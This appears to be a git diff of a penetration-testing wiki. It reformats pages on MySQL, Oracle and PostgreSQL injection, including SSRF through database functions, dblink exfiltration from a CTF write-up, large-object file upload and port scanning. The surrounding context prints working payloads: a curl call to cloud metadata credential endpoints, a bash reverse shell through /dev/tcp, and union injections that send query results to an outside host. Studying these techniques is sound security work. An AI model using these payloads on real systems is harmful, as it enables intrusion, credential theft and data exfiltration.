+**(From** [**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**)** Non-standard whitespace characters: %C2%85 или %C2%A0:
 
 ```
 https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null-- 
diff --git a/pentesting-web/sql-injection/mysql-injection/README.md b/pentesting-web/sql-injection/mysql-injection/README.md
index ee3a4f40..d67c9ae1 100644
--- a/pentesting-web/sql-injection/mysql-injection/README.md
+++ b/pentesting-web/sql-injection/mysql-injection/README.md
@@ -1,6 +1,6 @@
 # MySQL injection
 
-**This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to: **[**https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md**](https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)****
+**This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to:** [**https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md**](https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)****
 
 ## Comments
 
@@ -58,7 +58,7 @@ from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/]
 
 ## Flow
 
-Remember that in "modern" versions of **MySQL **you can substitute "_**information_schema.tables**_" for "_**mysql.innodb_table_stats**_**" **(This could be useful to bypass WAFs).
+Remember that in "modern" versions of **MySQL** you can substitute "_**information\_schema.tables**_" for "_**mysql.innodb\_table\_stats**_**"** (This could be useful to bypass WAFs).
 
 ```sql
 SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
@@ -85,7 +85,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
 * `SELECT LEFT(version(),1...lenght(version()))='asd'...`
 * `SELECT INSTR('foobarbar', 'fo...')=1`
 
-## Detect number of columns 
+## Detect number of columns&#x20;
 
 Using a simple ORDER
 
@@ -113,13 +113,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 
 ## SSRF
 
-**Learn here different options to **[**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.**
+**Learn here different options to** [**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.**
 
 ## WAF bypass tricks
 
-### Information_schema alternatives
+### Information\_schema alternatives
 
-Remember that in "modern" versions of **MySQL **you can substitute _**information_schema.tables**_ for _**mysql.innodb_table_stats**_** **or for _**sys.x$schema_flattened_keys **_or for **sys.schema_table_statistics**
+Remember that in "modern" versions of **MySQL** you can substitute _**information\_schema.tables**_ for _**mysql.innodb\_table\_stats**_** ** or for _**sys.x$schema\_flattened\_keys**_ or for **sys.schema\_table\_statistics**
 
 ![](<../../../.gitbook/assets/image (154).png>)
 
@@ -154,7 +154,7 @@ More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14
 
 ### MySQL history
 
-You ca see other executions inside the MySQL reading the table: **sys.x$statement_analysis**
+You ca see other executions inside the MySQL reading the table: **sys.x$statement\_analysis**
 
 ### Version alternative**s**
 
diff --git a/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md b/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
index ffbc343b..38be1c25 100644
--- a/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
+++ b/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
@@ -1,8 +1,8 @@
 # Mysql SSRF
 
-**Post copied from **[**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona)****
+**Post copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona)****
 
-### Using LOAD_FILE/LOAD DATA/LOAD XML
+### Using LOAD\_FILE/LOAD DATA/LOAD XML
 
 Every SQL Out of Band data exfiltration article will use the `LOAD_FILE()` string function to make a network request. The function itself has its own limitations based on the operating system it is run on and the settings with which the database was started.
 
@@ -32,7 +32,7 @@ Basically for you to load a custom library into MySQL and call a function from t
 * `file_priv` set to `Y` in `mysql.user` for the current database user
 * `secure_file_priv` set to `""` so that you can read the raw bytes of the library from an arbitrary location like the network or a file uploads directory in a web application.
 
-Assuming the above conditions are met, you can use the classical approach of transferring the [popular MySQL UDF `lib_mysqludf_sys` library](https://github.com/mysqludf/lib_mysqludf_sys) to the database server. You would then be able to make operating system command requests like `cURL` or `powershell wget` to perform SSRF using the syntax
+Assuming the above conditions are met, you can use the classical approach of transferring the [popular MySQL UDF `lib_mysqludf_sys` library](https://github.com/mysqludf/lib\_mysqludf\_sys) to the database server. You would then be able to make operating system command requests like `cURL` or `powershell wget` to perform SSRF using the syntax
 
 `x'; SELECT sys_eval('curl http://169.254.169.254/latest/meta-data/iam/security-credentials/'); -- //`
 
diff --git a/pentesting-web/sql-injection/oracle-injection.md b/pentesting-web/sql-injection/oracle-injection.md
index 07f3db8a..bf95b6e6 100644
--- a/pentesting-web/sql-injection/oracle-injection.md
+++ b/pentesting-web/sql-injection/oracle-injection.md
@@ -2,7 +2,7 @@
 
 ## SSRF
 
-**Information copied from **[**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle)****
+**Information copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle)****
 
 Using Oracle to do Out of Band HTTP and DNS requests is well documented but as a means of exfiltrating SQL data in injections. We can always modify these techniques/functions to do other SSRF/XSPA.
 
@@ -14,7 +14,7 @@ I ran the docker command with the `--network="host"` flag so that I could mimic
 docker run -d --network="host" quay.io/maksymbilenko/oracle-12c 
 ```
 
-#### Oracle packages that support a URL or a Hostname/Port Number specification <a href="oracle-packages-that-support-a-url-or-a-hostname-port-number-specification" id="oracle-packages-that-support-a-url-or-a-hostname-port-number-specification"></a>
+#### Oracle packages that support a URL or a Hostname/Port Number specification <a href="#oracle-packages-that-support-a-url-or-a-hostname-port-number-specification" id="oracle-packages-that-support-a-url-or-a-hostname-port-number-specification"></a>
 
 In order to find any packages and functions that support a host and port specification, I ran a Google search on the [Oracle Database Online Documentation](https://docs.oracle.com/database/121/index.html). Specifically,
 
@@ -24,26 +24,26 @@ site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portn
 
 The search returned the following results (not all can be used to perform outbound network)
 
-* DBMS_NETWORK_ACL_ADMIN
-* UTL_SMTP
-* DBMS_XDB
-* DBMS_SCHEDULER
-* DBMS_XDB_CONFIG
-* DBMS_AQ
-* UTL_MAIL
-* DBMS_AQELM
-* DBMS_NETWORK_ACL_UTILITY
-* DBMS_MGD_ID_UTL
-* UTL_TCP
-* DBMS_MGWADM
-* DBMS_STREAMS_ADM
-* UTL_HTTP
+* DBMS\_NETWORK\_ACL\_ADMIN
+* UTL\_SMTP
+* DBMS\_XDB
+* DBMS\_SCHEDULER
+* DBMS\_XDB\_CONFIG
+* DBMS\_AQ
+* UTL\_MAIL
+* DBMS\_AQELM
+* DBMS\_NETWORK\_ACL\_UTILITY
+* DBMS\_MGD\_ID\_UTL
+* UTL\_TCP
+* DBMS\_MGWADM
+* DBMS\_STREAMS\_ADM
+* UTL\_HTTP
 
-This crude search obviously skips packages like `DBMS_LDAP` (which allows passing a hostname and port number) as [the documentation page](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360) simply points you to a [different location](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360). Hence, there may be other Oracle packages that can be abused to make outbound requests that I may have missed.
+This crude search obviously skips packages like `DBMS_LDAP` (which allows passing a hostname and port number) as [the documentation page](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360) simply points you to a [different location](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360). Hence, there may be other Oracle packages that can be abused to make outbound requests that I may have missed.
 
 In any case, let’s take a look at some of the packages that we have discovered and listed above.
 
-**DBMS_LDAP.INIT**
+**DBMS\_LDAP.INIT**
 
 The `DBMS_LDAP` package allows for access of data from LDAP servers. The `init()` function initializes a session with an LDAP server and takes a hostname and port number as an argument.
 
@@ -68,9 +68,9 @@ SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
 
 A `ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.` shows that the port is closed while a session value points to the port being open.
 
-**UTL_SMTP**
+**UTL\_SMTP**
 
-The `UTL_SMTP` package is designed for sending e-mails over SMTP. The example provided on the [Oracle documentation site shows how you can use this package to send an email](https://docs.oracle.com/database/121/ARPLS/u_smtp.htm#ARPLS71478). For us, however, the interesting thing is with the ability to provide a host and port specification.
+The `UTL_SMTP` package is designed for sending e-mails over SMTP. The example provided on the [Oracle documentation site shows how you can use this package to send an email](https://docs.oracle.com/database/121/ARPLS/u\_smtp.htm#ARPLS71478). For us, however, the interesting thing is with the ability to provide a host and port specification.
 
 A crude example is shown below with the `UTL_SMTP.OPEN_CONNECTION` function, with a timeout of 2 seconds
 
@@ -92,11 +92,11 @@ END;
 
 A `ORA-29276: transfer timeout` shows port is open but no SMTP connection was estabilished while a `ORA-29278: SMTP transient error: 421 Service not available` shows that the port is closed.
 
-**UTL_TCP**
+**UTL\_TCP**
 
-The `UTL_TCP` package and its procedures and functions allow [TCP/IP based communication with services](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u_tcp.htm#i1004190). If programmed for a specific service, this package can easily become a way into the network or perform full Server Side Requests as all aspects of a TCP/IP connection can be controlled.
+The `UTL_TCP` package and its procedures and functions allow [TCP/IP based communication with services](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). If programmed for a specific service, this package can easily become a way into the network or perform full Server Side Requests as all aspects of a TCP/IP connection can be controlled.
 
-The example [on the Oracle documentation site shows how you can use this package to make a raw TCP connection to fetch a web page](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u_tcp.htm#i1004190). We can simply it a little more and use it to make requests to the metadata instance for example or to an arbitrary TCP/IP service.
+The example [on the Oracle documentation site shows how you can use this package to make a raw TCP connection to fetch a web page](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). We can simply it a little more and use it to make requests to the metadata instance for example or to an arbitrary TCP/IP service.
 
 ```
 set serveroutput on size 30000;
@@ -144,9 +144,9 @@ END;
 
 Interestingly, due to the ability to craft raw TCP requests, this package can also be used to query the Instance meta-data service of all cloud providers as the method type and additional headers can all be passed within the TCP request.
 
-**UTL_HTTP and Web Requests**
+**UTL\_HTTP and Web Requests**
 
-Perhaps the most common and widely documented technique in every Out of Band Oracle SQL Injection tutorial out there is the [`UTL_HTTP` package](https://docs.oracle.com/database/121/ARPLS/u_http.htm#ARPLS070). This package is defined by the documentation as - `The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.`
+Perhaps the most common and widely documented technique in every Out of Band Oracle SQL Injection tutorial out there is the [`UTL_HTTP` package](https://docs.oracle.com/database/121/ARPLS/u\_http.htm#ARPLS070). This package is defined by the documentation as - `The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.`
 
 ```
 select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
@@ -166,5 +166,5 @@ select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
 
 A `ORA-12541: TNS:no listener` or a `TNS:operation timed out` is a sign that the TCP port is closed, whereas a `ORA-29263: HTTP protocol error` or data is a sign that the port is open.
 
-Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/22.png)](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)
+Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t\_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/22.png)](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)
 
diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md
index cff0086c..812df601 100644
--- a/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -10,7 +10,7 @@
 
 ### **Exfiltration example using dblink and large objects**
 
-You can [**read this example**](dblink-lo_import-data-exfiltration.md) **\*\*to see a CTF example of **how to load data inside large objects and then exfiltrate the content of large objects inside the username\*\* of the function `dblink_connect`.
+You can [**read this example**](dblink-lo\_import-data-exfiltration.md) **\*\*to see a CTF example of** how to load data inside large objects and then exfiltrate the content of large objects inside the username\*\* of the function `dblink_connect`.
 
 ## PL/pgSQL password bruteforce
 
@@ -46,7 +46,7 @@ However, there are **other techniques to upload big binary files**.\
 
 ### **RCE from version 9.3**
 
-Since[ version 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), new functionality for '[COPY TO/FROM PROGRAM](https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/)' was implemented. This allows the database superuser, and any user in the ‘pg_execute_server_program’ group to run arbitrary operating system commands.
+Since[ version 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), new functionality for '[COPY TO/FROM PROGRAM](https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/)' was implemented. This allows the database superuser, and any user in the ‘pg\_execute\_server\_program’ group to run arbitrary operating system commands.
 
 ```bash
 #PoC
@@ -86,7 +86,7 @@ Then, an attacker will need to:
 1. **Dump private key** from the server
 2. **Encrypt** downloaded private key:
    1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key`
-3. **Overwrite** 
+3. **Overwrite**&#x20;
 4. **Dump** the current postgresql **configuration**
 5. **Overwrite** the **configuration** with the mentioned attributes configuration:
    1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'`
@@ -115,7 +115,7 @@ id=1; select pg_sleep(10);-- -
 
 ### XML tricks
 
-#### query_to_xml
+#### query\_to\_xml
 
 This function will return all the data in XML format in just one file. It's ideal if you want to dump a lot of data in just 1 row:
 
@@ -123,7 +123,7 @@ This function will return all the data in XML format in just one file. It's idea
 SELECT query_to_xml('select * from pg_user',true,true,'');
 ```
 
-#### database_to_xml
+#### database\_to\_xml
 
 This function will dump the whole database in XML format in just 1 row (be careful if the database is very big as you may DoS it or even your own client):
 
diff --git a/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md b/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
index 29cce4db..1c04f56a 100644
--- a/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
+++ b/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
@@ -2,11 +2,11 @@
 
 ## PostgreSQL Large Objects
 
-PostgreSQL exposes a structure called** large object (**`pg_largeobject`  table), which is used for storing data that would be difficult to handle in its entirety (like an image or a PDF document). As opposed to the `COPY TO` function, the advantage of **large objects** lies in the fact that the **data **they **hold **can be **exported back **to the **file system **as an** identical copy of the original imported file**.
+PostgreSQL exposes a structure called **large object (**`pg_largeobject`  table), which is used for storing data that would be difficult to handle in its entirety (like an image or a PDF document). As opposed to the `COPY TO` function, the advantage of **large objects** lies in the fact that the **data** they **hold** can be **exported back** to the **file system** as an **identical copy of the original imported file**.
 
-In order to **save a complete file inside this table** you first need to **create an object** inside the mentioned table (identified by a **LOID**) and then** insert chunks of 2KB** inside this object. It's very important that all the **chunks have 2KB** (except possible the last one) **or **the **exporting **function to the file system **won't work**.
+In order to **save a complete file inside this table** you first need to **create an object** inside the mentioned table (identified by a **LOID**) and then **insert chunks of 2KB** inside this object. It's very important that all the **chunks have 2KB** (except possible the last one) **or** the **exporting** function to the file system **won't work**.
 
-In order to **split **your **binary **in **chunks **of size **2KB **you can do:
+In order to **split** your **binary** in **chunks** of size **2KB** you can do:
 
 ```bash
 split -b 2048 pg_exec.so #This will create files of size 2KB
@@ -20,7 +20,7 @@ xxd -ps -c 99999999999 <Chunk_file> #Encoded in 1 line
 ```
 
 {% hint style="info" %}
-When exploiting this remember that you have to send **chunks of 2KB clear-text bytes** (not 2KB of base64 or hex encoded bytes). If you try to automate this, the size of a **hex encoded **file is the **double **(then you need to send 4KB of encoded data for each chunk) and the size of a **base64 **encoded file is `ceil(n / 3) * 4`
+When exploiting this remember that you have to send **chunks of 2KB clear-text bytes** (not 2KB of base64 or hex encoded bytes). If you try to automate this, the size of a **hex encoded** file is the **double** (then you need to send 4KB of encoded data for each chunk) and the size of a **base64** encoded file is `ceil(n / 3) * 4`
 {% endhint %}
 
 Also, debugging the process you can see the contents of the large objects created with:
@@ -29,7 +29,7 @@ Also, debugging the process you can see the contents of the large objects create
  select loid, pageno, encode(data, 'escape') from pg_largeobject;
 ```
 
-## Using lo_creat & Base64
+## Using lo\_creat & Base64
 
 First, we need to create a LOID where the binary data is going to be saved:
 
@@ -38,7 +38,7 @@ SELECT lo_creat(-1);       -- returns OID of new, empty large object
 SELECT lo_create(173454);   -- attempts to create large object with OID 43213
 ```
 
-If you are abusing a **Blind SQLinjection** you will be more interested on using `lo_create` with a **fixed LOID** so you **know where **you have to **upload **the **content**.\
+If you are abusing a **Blind SQLinjection** you will be more interested on using `lo_create` with a **fixed LOID** so you **know where** you have to **upload** the **content**.\
 Also, note that there is no syntax error the functions are `lo_creat` and `lo_create`.
 
 LOID is used to identify the object in the `pg_largeobjec`t table. Inserting chunks of size 2KB into the `pg_largeobject` table can be achieved using:
@@ -65,9 +65,9 @@ You possible may be interested in delete the large object created after exportin
 SELECT lo_unlink(173454);  -- deletes large object with OID 173454
 ```
 
-## Using lo_import & Hex
+## Using lo\_import & Hex
 
-In this scenario lo_import is going to be used to create a large object object. Fortunately in this case you can (and cannot) specify the LOID you would want to use:
+In this scenario lo\_import is going to be used to create a large object object. Fortunately in this case you can (and cannot) specify the LOID you would want to use:
 
 ```sql
 select lo_import('C:\\Windows\\System32\\drivers\\etc\\hosts');
@@ -83,7 +83,7 @@ update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and page
 update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=3;
 ```
 
-The HEX must be just the hex (without `0x` or `\x`), example: 
+The HEX must be just the hex (without `0x` or `\x`), example:&#x20;
 
 ```sql
 update pg_largeobject set data=decode('68656c6c6f', 'hex') where loid=173454 and pageno=0;
@@ -102,6 +102,6 @@ Note the in newest versions of postgres you may need to **upload the extensions
 
 ## Limitations
 
-After reading the documentation of large objects in PostgreSQL, we can find out that **large objects can has ACL **(Access Control List). It's possible to configure **new large objects** so your user **don't have enough privileges** to read them even if they were created by your user.
+After reading the documentation of large objects in PostgreSQL, we can find out that **large objects can has ACL** (Access Control List). It's possible to configure **new large objects** so your user **don't have enough privileges** to read them even if they were created by your user.
 
 However, there may be **old object with an ACL that allows current user to read it**, then we can exfiltrate that object's content.
diff --git a/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md b/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
index e5d2001a..bf9d1c0e 100644
--- a/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
+++ b/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
@@ -1,21 +1,21 @@
-# dblink/lo_import data exfiltration
+# dblink/lo\_import data exfiltration
 
 **This is an example of how to exfiltrate data loading files in the database with `lo_import` and exfiltrate them using `dblink_connect`.**
 
 ## **Preparing the exfiltration server/**Asynchronous SQL Injection
 
-**Extracted from: **[**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)****
+**Extracted from:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)****
 
 Because the `pg_sleep` also doesn't cause delay, we can safely assume if query execution occurs in the background or asynchronously.
 
 Normally, `dblink_connect` can be used to open a persistent connection to a remote PostgreSQL database (e.g. `SELECT dblink_connect('host=HOST user=USER password=PASSWORD dbname=DBNAME')`). Because we can control the parameter of this function, we can perform SQL Server Side Request Forgery to our own host. That means, we can perform Out-of-Band SQL Injection to exfiltrate data from SQL query results. At least, there are two ways to do this:
 
-1. Set up a **DNS server **and then trigger the connection to `[data].our.domain` so that we can see the data in the log or in the DNS network packets.
-2. Set up a **public PostgreSQL server, monitor the incoming network packets to PostgreSQL port**, and then trigger a connection to our host with exfiltrated data as `user`/`dbname`. By **default**, PostgreSQL doesn't use SSL for communication so we can see `user`/`dbname` as a** plain-text **on the network.
+1. Set up a **DNS server** and then trigger the connection to `[data].our.domain` so that we can see the data in the log or in the DNS network packets.
+2. Set up a **public PostgreSQL server, monitor the incoming network packets to PostgreSQL port**, and then trigger a connection to our host with exfiltrated data as `user`/`dbname`. By **default**, PostgreSQL doesn't use SSL for communication so we can see `user`/`dbname` as a **plain-text** on the network.
 
 The **second method is easier** because we don't need any domain. We only need to set up a server with a public IP, install PostgreSQL, set the PostgreSQL service to listen to \*/0.0.0.0, and run a network dumper (e.g. tcpdump) to monitor traffic to the PostgreSQL port (5432 by default).
 
-To set PostgreSQL so that it will** listen to the public**, set `listen_addresses` in `postgresql.conf` to `*`.
+To set PostgreSQL so that it will **listen to the public**, set `listen_addresses` in `postgresql.conf` to `*`.
 
 ```
 listen_addresses = '*'
@@ -47,7 +47,7 @@ If successful, we get a piece of network packet with readable `user` and `dbname
 
 Then, we can **continue to extract the database using several PostgreSQL queries**. Note that for each query result that contains whitespaces, we need to convert the result to **hex/base64** with `encode` function or replace the whitespace to other character with `replace` function because it will cause an execution error during `dblink_connect` process.
 
-Get a **list **of **schemas**:
+Get a **list** of **schemas**:
 
 ```
 asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(schema_name,':') FROM information_schema.schemata) || ' password=postgres dbname=postgres')) --
@@ -65,7 +65,7 @@ asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg
     0x0070:  6f73 7467 7265 7300 00                   ostgres.
 ```
 
-Get a **list **of **tables **in current schema:
+Get a **list** of **tables** in current schema:
 
 ```
 asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(tablename, ':') FROM pg_catalog.pg_tables WHERE schemaname=current_schema()) || ' password=postgres dbname=postgres')) --
@@ -81,7 +81,7 @@ asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg
     0x0050:  7365 0070 6f73 7467 7265 7300 00         se.postgres.
 ```
 
-**Count **the **rows **in `searches` table.
+**Count** the **rows** in `searches` table.
 
 ```
 asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT COUNT(*) FROM searches) || ' password=postgres dbname=postgres')) --
@@ -123,7 +123,7 @@ asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT lo_import(
 
 We got 24668 as `oid` so that means we can use `lo_import` function. Unfortunately, we won't get any results if we try to get the content of large object using `lo_get(24668)` or directly access the `pg_largeobject` catalog. **It looks like the current user doesn't have permission to read the content of new objects.**
 
-After reading the documentation of large objects in PostgreSQL, we can find out that **large objects can has ACL **(Access Control List). That means, if there is an old object with an ACL that allows current user to read it, then we can exfiltrate that object's content.
+After reading the documentation of large objects in PostgreSQL, we can find out that **large objects can has ACL** (Access Control List). That means, if there is an old object with an ACL that allows current user to read it, then we can exfiltrate that object's content.
 
 We can get a list of available large object's `oid` by extracting from `pg_largeobject_metadata`.
 
@@ -161,5 +161,5 @@ asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT convert_fr
 
 #### More info of oid:
 
-* [https://balsn.tw/ctf_writeup/20190603-facebookctf/#hr_admin_module](https://balsn.tw/ctf_writeup/20190603-facebookctf/#hr_admin_module)
+* [https://balsn.tw/ctf\_writeup/20190603-facebookctf/#hr\_admin\_module](https://balsn.tw/ctf\_writeup/20190603-facebookctf/#hr\_admin\_module)
 * [https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
diff --git a/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md b/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
index 19fe59c0..9023d5e1 100644
--- a/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
+++ b/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
@@ -10,16 +10,16 @@ Once you have dblink loaded you could be able to perform some interesting tricks
 
 ### Privilege Escalation
 
-The file `pg_hba.conf` could be bad configured **allowing connections **from **localhost as any user **without needing to know the password. This file could be typically found in `/etc/postgresql/12/main/pg_hba.conf` and a bad configuration looks like:
+The file `pg_hba.conf` could be bad configured **allowing connections** from **localhost as any user** without needing to know the password. This file could be typically found in `/etc/postgresql/12/main/pg_hba.conf` and a bad configuration looks like:
 
 ```
 local    all    all    trust
 ```
 
 _Note that this configuration is commonly used to modify the password of a db user when the admin forget it, so sometimes you may find it._\
-_Note also that the file pg_hba.conf is readable only by postgres user and group and writable only by postgres user._
+_Note also that the file pg\_hba.conf is readable only by postgres user and group and writable only by postgres user._
 
-This case is **useful if **you **already **have a **shell **inside the victim as it will allow you to connect to postgresql database.
+This case is **useful if** you **already** have a **shell** inside the victim as it will allow you to connect to postgresql database.
 
 Another possible misconfiguration consist on something like this:
 
@@ -28,7 +28,7 @@ host    all     all     127.0.0.1/32    trust
 ```
 
 As it will allow everybody from the localhost to connect to the database as any user.\
-In this case and if the **`dblink`** function is **working**, you could **escalate privileges **by connecting to the database through an already established connection and access data shouldn't be able to access:
+In this case and if the **`dblink`** function is **working**, you could **escalate privileges** by connecting to the database through an already established connection and access data shouldn't be able to access:
 
 ```sql
 SELECT * FROM dblink('host=127.0.0.1
@@ -44,11 +44,11 @@ SELECT * FROM dblink('host=127.0.0.1
                       RETURNS (result1 TEXT, result2 TEXT);
 ```
 
-**Find **[**more information about this attack in this paper**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)**.**
+**Find** [**more information about this attack in this paper**](http://www.leidecker.info/pgshell/Having\_Fun\_With\_PostgreSQL.txt)**.**
 
 ### Port Scanning
 
-Abusing `dblink_connect` you could also** search open ports**. If that **function doesn't work you should try to use `dblink_connect_u()` **as the documentation says that  _`dblink_connect_u()` is identical to `dblink_connect()`, except that it will allow non-superusers to connect using any authentication method_.
+Abusing `dblink_connect` you could also **search open ports**. If that **function doesn't work you should try to use `dblink_connect_u()` ** as the documentation says that  _`dblink_connect_u()` is identical to `dblink_connect()`, except that it will allow non-superusers to connect using any authentication method_.
 
 ```sql
 SELECT * FROM dblink_connect('host=216.58.212.238
@@ -77,7 +77,7 @@ ERROR:  could not establish connection
 DETAIL:  received invalid response to SSL negotiation:
 ```
 
-Note that **before **being able to use` dblink_connect` or `dblink_connect_u` you may need to execute:
+Note that **before** being able to use `dblink_connect` or `dblink_connect_u` you may need to execute:
 
 ```
 CREATE extension dblink;
diff --git a/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md b/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
index 3d7e1448..40db24ae 100644
--- a/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
+++ b/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
@@ -1,6 +1,6 @@
 # PL/pgSQL Password Bruteforce
 
-PL/pgSQL, as a** fully featured programming language**, allows much more procedural control than SQL, including the **ability to use loops and other control structures**. SQL statements and triggers can call functions created in the PL/pgSQL language.
+PL/pgSQL, as a **fully featured programming language**, allows much more procedural control than SQL, including the **ability to use loops and other control structures**. SQL statements and triggers can call functions created in the PL/pgSQL language.
 
 You can abuse this language in order to ask PostgreSQL to brute-force the users credentials, but it must exist on the database. You can verify it's existence using:
 
@@ -11,7 +11,7 @@ SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
      plpgsql |
 ```
 
